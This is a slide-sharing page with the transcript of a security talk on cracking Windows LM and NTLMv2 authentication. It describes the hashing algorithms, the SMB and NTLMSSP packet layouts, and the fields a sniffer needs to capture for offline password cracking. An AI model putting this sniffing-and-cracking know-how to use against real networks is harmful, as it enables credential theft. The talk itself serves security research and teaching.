1 / 54

Cracking NTLMv2 Authentication

Cracking NTLMv2 Authentication. Urity@SecurityFriday.com. NTLM version 2 - in Microsoft Knowledge Base -. “ Microsoft has developed an enhancement, called NTLM version 2, that significantly improves both the authentication and session security mechanisms. ”

omar
Download Presentation

Cracking NTLMv2 Authentication

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Cracking NTLMv2 Authentication Urity@SecurityFriday.com

  2. NTLM version 2- in Microsoft Knowledge Base - “Microsoft has developed an enhancement, called NTLM version 2, that significantly improves both the authentication and session security mechanisms.” “For NTLMv2, the key space for password-derived keys is 128 bits. This makes a brute force search infeasible, even with hardware accelerators, if the password is strong enough.” Cracking NTLMv2 Authentication

  3. Windows authentications for network logons • LAN Manager (LM) challenge/response • Windows NT challenge/response (also known as NTLM version 1) • NTLM version 2 challenge/response • Kerberos Cracking NTLMv2 Authentication

  4. Agenda • LM authentication mechanism • Demonstration (1) • NTLM v2 authentication algorithm • Sniffing SMB traffic on port 139 • Sniffing SMB traffic on port 445 • Demonstration (2) Cracking NTLMv2 Authentication

  5. Agenda • LM authentication mechanism • Demonstration (1) • NTLM v2 authentication algorithm • Sniffing SMB traffic on port 139 • Sniffing SMB traffic on port 445 • Demonstration (2) Cracking NTLMv2 Authentication

  6. Challenge/Response sequence Request to connect Respond with a challenge code Send an encrypted password Reply with the result of authentication Cracking NTLMv2 Authentication

  7. LM challenge/response- 1 - uppercase(password[1..7]) as KEY magic word LM_hash[1..8] DES uppercase(password[8..14]) as KEY magic word LM_hash[9..16] DES LM_hash[17..21] 00 00 00 00 00 magic word is “KGS!@#$%” Cracking NTLMv2 Authentication

  8. LM challenge/response- 2 - LM_hash[1..7] as KEY challenge code DES LM_response[1..8] LM_hash[8..14] as KEY challenge code DES LM_response[9..16] LM_hash[15..21] 00 00 00 00 00 as KEY challenge code DES LM_response[17..24] Cracking NTLMv2 Authentication

  9. AA D3 B4 35 B5 14 04 EE Password Less than 8 Characters uppercase(password[8..14]) 00 00 00 00 00 00 00 as KEY LM_hash[9..16] magic word DES AA D3 B4 35 B5 14 04 EE LM_hash[8..14] as KEY challenge code DES LM_response[9..16] LM_hash[15..21] 00 00 00 00 00 as KEY challenge code DES LM_response[17..24] Cracking NTLMv2 Authentication

  10. BeatLM demonstration • check the password less than 8 • 1000 authentication data in our office Cracking NTLMv2 Authentication

  11. Weakness of LM & NTLMv1 See: • Hacking Exposed Windows 2000 • Microsoft Knowledge Base: Q147706 • L0phtcrack documentation Cracking NTLMv2 Authentication

  12. Agenda • LM authentication mechanism • Demonstration (1) • NTLM v2 authentication algorithm • Sniffing SMB traffic on port 139 • Sniffing SMB traffic on port 445 • Demonstration (2) Cracking NTLMv2 Authentication

  13. NTLM 2 Authentication unicode(password) MD4 as KEY unicode( uppercase(account name) +domain_or_hostname) HMAC_MD5 as KEY NTLMv2 Response server_challenge +client_challenge HMAC_MD5 Cracking NTLMv2 Authentication

  14. NTLMv2 more info- algorithm & how to enable - • HMAC: RFC2104 • MD5: RFC1321 • MD4: RFC1320 • Microsoft Knowledge Base: Q239869 Cracking NTLMv2 Authentication

  15. LM, NTLMv1, NTLMv2 Cracking NTLMv2 Authentication

  16. Agenda • LM authentication mechanism • Demonstration (1) • NTLM v2 authentication algorithm • Sniffing SMB traffic on port 139 • Sniffing SMB traffic on port 445 • Demonstration (2) Cracking NTLMv2 Authentication

  17. Authentication sequence- NetBT (NetBIOS over TCP/IP) - SMB_COM_NEGOTIATE request SMB_COM_NEGOTIATE response SMB_COM_SESSION_SETUP_ANDX request SMB_COM_SESSION_SETUP_ANDX response Cracking NTLMv2 Authentication

  18. Extra SMB commands- NetBT (NetBIOS over TCP/IP) - SMB_COM_NEGOTIATE request SMB_COM_NEGOTIATE response NT/2000 SMB_COM_XXX request SMB_COM_XXX response SMB_COM_SESSION_SETUP_ANDX request SMB_COM_SESSION_SETUP_ANDX response Cracking NTLMv2 Authentication

  19. Authentication packet header Ethernet IP TCP FF 53 4D 42 SMB block size SMB command SMB mark: 0xFF, 0x53, 0x4D, 0x42 ‘S’ ‘M’ ‘B’ Cracking NTLMv2 Authentication

  20. SMB general header structure SMB command Flags Some fields Error code SMB mark FF 53 4D 42 WordCount ByteCount ParameterWords - variable length - Buffer - variable length - Cracking NTLMv2 Authentication

  21. SMB_COM_NEGOTIATE request over NetBT • SMB command: 0x72 • WordCount: 0x00 Cracking NTLMv2 Authentication

  22. SMB_COM_NEGOTIATE response over NetBT • SMB command: 0x72 • Flags • Server response bit: on • WordCount: 0x11 • Buffer contains • Server challenge code: 8 bytes Cracking NTLMv2 Authentication

  23. Server challenge code SMB command Flags SMB mark FF 53 4D 42 72 8X WordCount 11 ByteCount Server challenge code Cracking NTLMv2 Authentication

  24. SMB_COM_SESSION_SETUP_ANDX request over NetBT • SMB command: 0x73 • WordCount: 0x0D • Buffer contains • Encrypted password: 16 bytes • Client challenge code: 8 bytes • Account name • Domain/Workgroup/Host name Cracking NTLMv2 Authentication

  25. Encrypted password SMB mark SMB command ByteCount FF 53 4D 42 73 WordCount 0D Length Client challenge code Encrypted password Account & Domain/Host name If client challenge code = 0x0000000000000000 then DS client Cracking NTLMv2 Authentication

  26. 2nd encrypted password- 1 - • NT/2000 transmits two types encrypted password • 2nd client challenge code has variable length Cracking NTLMv2 Authentication

  27. 2nd encrypted password- 2 - FF 53 4D 42 73 2nd length 0D 2nd encrypted password 2nd client challenge code, account & domain/host name Cracking NTLMv2 Authentication

  28. SMB_COM_SESSION_SETUP_ANDX response over NetBT • SMB command: 0x73 • Error code • WordCount: 0x03 Cracking NTLMv2 Authentication

  29. Error code- correct password - • 0xC000006F • The user is not allowed to log on at this time. • 0xC0000070 • The user is not allowed to log on from this workstation. • 0xC0000071 • The password of this user has expired. • 0xC0000072 • Account currently disabled. • 0xC0000193 • This user account has expired. • 0xC0000224 • The user’s password must be changed before logging on the first time. Cracking NTLMv2 Authentication

  30. Requisite information • Account name • Domain/Workgroup/Host name • Server challenge code • Client challenge code • Encrypted password • The result of authentication Cracking NTLMv2 Authentication

  31. SMB protocol- specifications - Please check out: • ftp.microsoft.com/developr/drg/cifs • DCE/RPC over SMB (ISBN 1-57870-150-3) • www.samba.org/cifs/docs/what-is-smb.html Cracking NTLMv2 Authentication

  32. Win 98/ME file sharing- encrypted password - 98/ME file sharing 98/ME with DS Client SMB_COM_NEGOTIATE request SMB_COM_NEGOTIATE response not NTLMv2 SMB_COM_SESSION_SETUP_ANDX request SMB_COM_SESSION_SETUP_ANDX response Cracking NTLMv2 Authentication

  33. Agenda • LM authentication mechanism • Demonstration (1) • NTLM v2 authentication algorithm • Sniffing SMB traffic on port 139 • Sniffing SMB traffic on port 445 • Demonstration (2) Cracking NTLMv2 Authentication

  34. Authentication sequence- MS-DS (Direct SMB Hosting Service) - SMB_COM_NEGOTIATE request 2000 SMB_COM_NEGOTIATE response 2000 SMB_COM_SESSION_SETUP_ANDX request SMB_COM_SESSION_SETUP_ANDX response SMB_COM_SESSION_SETUP_ANDX request SMB_COM_SESSION_SETUP_ANDX response Cracking NTLMv2 Authentication

  35. Challenge/Response- MS-DS (Direct SMB Hosting Service) - Request to authenticate with NTLMSSP Respond with a challenge code in NTLMSSP Send an encrypted password in NTLMSSP Reply with the result of authentication Cracking NTLMv2 Authentication

  36. 1st SMB_COM_SESSION_SETUP_ANDX request over MS-DS • WordCount: 0x0C • Buffer contains • SecurityBlob Cracking NTLMv2 Authentication

  37. SMB_COM_SESSION_SETUP_ANDX- WordCount - • Type 3 has • OS name, LM type, Domain name • Type 4 has • SecurityBlob, OS name, LM type, Domain name • Type 12 has • SecurityBlob, OS name, LM type • Type 13 has • Password, Account name, Domain name, OS name, LM type Cracking NTLMv2 Authentication

  38. SMB_COM_SESSION_SETUP_ANDX command - Type 12 (0x0C) SMB mark SMB command ByteCount FF 53 4D 42 73 WordCount 0C SecurityBlob length SecurityBlob - variable length - Cracking NTLMv2 Authentication

  39. NTLMSSP mark: 8-byte ASCII string 1: 4-byte little-endian Unknown flags: 4bytes (If any) Domain/Workgroup name length: 2-byte little-endian * 2 (If any) Domain/Workgroup name offset: 4-byte little-endian (If any) Host name length: 2-byte little-endian * 2 (If any) Host name offset: 4-byte little-endian (If any) Host name & Domain/Workgroup name NTLMSSP 1 in SecurityBlob 4E 54 4C 4D 53 53 50 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Cracking NTLMv2 Authentication

  40. 1st SMB_COM_SESSION_SETUP_ANDX response over MS-DS • WordCount: 0x04 • Buffer contains • SecurityBlob Cracking NTLMv2 Authentication

  41. SMB_COM_SESSION_SETUP_ANDX command - Type 4 (0x04) SMB command SMB mark SecurityBlob length FF 53 4D 42 73 8X WordCount 04 SecurityBlob - variable length - Cracking NTLMv2 Authentication

  42. NTLMSSP mark: 8-byte ASCII string 2: 4-byte little-endian Host name length: 2-byte little-endian * 2 Host name offset: 4-byte little-endian Unknown flags: 4bytes Server challenge code: 8bytes 8-byte zero Host & Domain name length: 2-byte little-endian Host & Domain name offset: 4-byte little-endian Host name & Domain name NTLMSSP 2 in SecurityBlob 4E 54 4C 4D 53 53 50 00 02 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 Cracking NTLMv2 Authentication

  43. 2nd SMB_COM_SESSION_SETUP_ANDX request over MS-DS • WordCount: 0x0C • Buffer contains • SecurityBlob Cracking NTLMv2 Authentication

  44. SMB_COM_SESSION_SETUP_ANDX command - Type 12 (0x0C) SMB mark SMB command ByteCount FF 53 4D 42 73 WordCount 0C SecurityBlob length SecurityBlob - variable length - Cracking NTLMv2 Authentication

  45. NTLMSSP mark: 8-byte ASCII string 3: 4-byte little-endian LM response length & offset NT response length & offset Domain/Host name length & offset Account name length & offset Host name length & offset Unknown data length & offset Unknown flags: 4bytes Domain/Host name, Account name, Host name, LM response, NT response & Unknown data NTLMSSP 3 in SecurityBlob 4E 54 4C 4D 53 53 50 00 03 00 00 00 40 00 00 00 Cracking NTLMv2 Authentication

  46. NTLMv2 LM/NT response • LM response is constructed with • 1st encrypted password: 16bytes • 1st client challenge code: 8bytes • NT response is constructed with • 2nd encrypted password: 16bytes • 2nd client challenge code: variable length Cracking NTLMv2 Authentication

  47. 2nd SMB_COM_SESSION_SETUP_ANDX response over MS-DS • Error code • WordCount: 0x04 Cracking NTLMv2 Authentication

  48. Requisite information • Account name • Domain/Workgroup/Host name • Server challenge code • Client challenge code • Encrypted password • The result of authentication Cracking NTLMv2 Authentication

  49. NTLMSSP structure also used in NTLM authentication of • IIS • DCOM • NT Terminal Server • 2000 Terminal Service • NNTP Service Cracking NTLMv2 Authentication

  50. Agenda • LM authentication mechanism • Demonstration (1) • NTLM v2 authentication algorithm • Sniffing SMB traffic on port 139 • Sniffing SMB traffic on port 445 • Demonstration (2) Cracking NTLMv2 Authentication

More Related